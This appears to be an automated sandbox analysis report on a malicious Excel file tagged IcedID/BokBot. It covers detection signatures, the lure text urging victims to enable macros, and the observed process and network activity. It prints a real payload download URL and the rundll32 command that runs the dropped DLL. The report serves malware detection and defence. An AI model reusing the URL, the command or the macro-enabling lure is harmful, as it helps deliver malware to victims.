Loading ...

Play interactive tourEdit tour

Analysis Report document-550193913.xls

Overview

General Information

Sample Name:document-550193913.xls
Analysis ID:356276
MD5:4107cd071635b4cc3689f77c688f57c3
SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
Tags:bokbotIcedIDmacrosxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6732 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6896 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-550193913.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11dab:$e1: Enable Editing
  • 0x11e20:$e2: Enable Content
document-550193913.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148a2:$s1: Excel
  • 0x15906:$s1: Excel
  • 0x3802:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-550193913.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6732, ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, ProcessId: 6896

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-550193913.xlsVirustotal: Detection: 9%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.6:49715 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: helendunnosteopathy.co.uk
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 208.91.199.118:443
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 208.91.199.118:443
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: helendunnosteopathy.co.uk
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.cortana.ai
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.office.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.onedrive.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://augloop.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cdn.entity.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cortana.ai
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cortana.ai/api
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://cr.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://directory.services.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://graph.windows.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://graph.windows.net/
    Source: document-550193913.xlsString found in binary or memory: https://helendunnosteopathy.co.uk/ds/2202.gif
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://login.windows.local
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://management.azure.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://management.azure.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://messaging.office.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://officeapps.live.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://onedrive.live.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://outlook.office.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://settings.outlook.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://tasks.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 72A41860-C1A7-4BDE-8AFA-23221FF1D9E1.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownHTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.6:49715 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please ch The specified module could not befound. 14 ' , , - from the yellow b
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Document image extraction number: 6Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? WYou are using IDS or
    Source: Screenshot number: 8Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Screenshot number: 8Screenshot OCR: Enable Content" from the yellow bar above d L) WHY I CANNOT OPEN THIS DOCUMENT? wYou are using i
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-550193913.xlsInitial sample: EXEC
    Source: document-550193913.xlsOLE indicator, VBA macros: true
    Source: document-550193913.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-550193913.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/6@1/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{53AE759C-8E06-469B-B2F9-B27B32D7DBEC} - OProcSessId.datJump to behavior
    Source: document-550193913.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: document-550193913.xlsVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
